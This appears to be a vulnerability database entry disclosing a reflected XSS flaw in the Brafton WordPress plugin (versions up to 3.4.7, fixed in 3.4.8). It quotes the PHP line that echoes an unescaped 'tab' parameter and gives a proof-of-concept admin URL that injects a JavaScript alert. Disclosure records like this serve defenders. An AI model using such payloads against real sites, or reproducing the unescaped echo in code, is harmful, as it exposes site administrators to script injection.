brafton WordPress Plugin <=3.4.7 - Reflected XSS

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Title -brafton WordPress Plugin XSS
 
# Exploit Title :  Vulnerabilitie XSS in brafton WordPress Plugin
# Date: Fri May 20  2016
# Reported Date : Fri May 20  2016
# Vendor Homepage: http://www.brafton.com/support/wordpress/
# Version: v3.3.10 – January2016
# Software Link: https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip
# Exploit Author :MehrdadLinux
# Tested On : Linux Platforms.
# Fix/Patching : Update To 
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------
 
brafton WordPress Plugin  v3.3.10 – January2016


2. BACKGROUND
-------------------------
this is WordPress Plugin  for Brafton  

Brafton is a content marketing agency. 
Our in-house teams develop and execute SEO-optimized content strategies, 
from news to infographics


3. DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php

in line 11 : 
	tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo 0;}?>;

wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))


4. discovered by :
-------------------------
 
The vulnerability has been discovered by Mehrdad Abbasi(MehrdadLinux) and Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com

 
5 .LEGAL NOTICES
-------------------------
 
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
 
Proof of Concept
XSS in BraftonAdminPage.php

in line 11 : 
	tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo 0;}?>;

wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))

Affects

Plugin BraftonWordpressPlugin
fixed in version 3.4.8

References

URL http://www.openwall.com/lists/oss-security/2016/05/20/5
URL http://www.brafton.com/support/wordpress/
URL https://github.com/ContentLEAD/BraftonWordpressPlugin
URL https://github.com/ContentLEAD/BraftonWordpressPlugin/pull/70
URL https://github.com/ContentLEAD/BraftonWordpressPlugin/issues/64

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Mehrdadlinux
Submitter Website www.Opsnit.com
Submitter Twitter https://twitter.com/MehrdadLinux
Views 257
Verified No
WPVDB ID 8614

Timeline

Publicly Published 2016-05-20 (7 months ago)
Added 2016-09-07 (3 months ago)
Last Updated 2016-09-07 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.